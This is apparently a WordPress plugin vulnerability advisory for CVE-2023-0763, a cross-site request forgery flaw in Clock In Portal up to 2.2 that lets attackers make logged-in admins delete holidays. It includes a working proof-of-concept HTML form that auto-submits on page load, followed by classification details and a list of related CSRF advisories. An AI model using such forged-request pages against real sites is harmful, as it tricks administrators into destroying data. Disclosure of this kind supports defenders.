Clock In Portal <= 2.2 – Holidays Deletion via CSRF | CVE 2023-0763 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when deleting Holidays, which could allow attackers to make logged in admins delete arbitrary holidays via a CSRF attack

Proof of Concept

Make a logged in admin open a page with the code below, this will make them delete the Holiday with ID 1

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=cip-holidays" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

clock-in-portal

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Sajjad Shariati

Submitter

Sajjad Shariati

Verified

Yes

WPVDB ID

4b55f868-62f8-43a1-9817-68cd1fc6190f

Timeline

Publicly Published

2023-04-18 (about 1 years ago)

Added

2023-04-18 (about 1 years ago)

Last Updated

2023-12-26 (about 4 months ago)

Other

Published

Title

Published

2023-12-06

Title

Multi Currency For WooCommerce < 1.5.6 - Cross-Site Request Forgery

Published

2024-01-31

Title

Setka Editor <= 2.1.20 - Cross-Site Request Forgery via handleRequest

Published

2024-01-23

Title

WP-Reply Notify <= 1.1 - Settings Update via CSRF

Published

2014-08-01

Title

SolveMedia 1.1.0 - solvemedia.admin.inc Admin Options Page CSRF

Published

2023-01-24

Title

Intuitive Custom Post Order < 3.1.4 - Arbitrary Menu Order Update via CSRF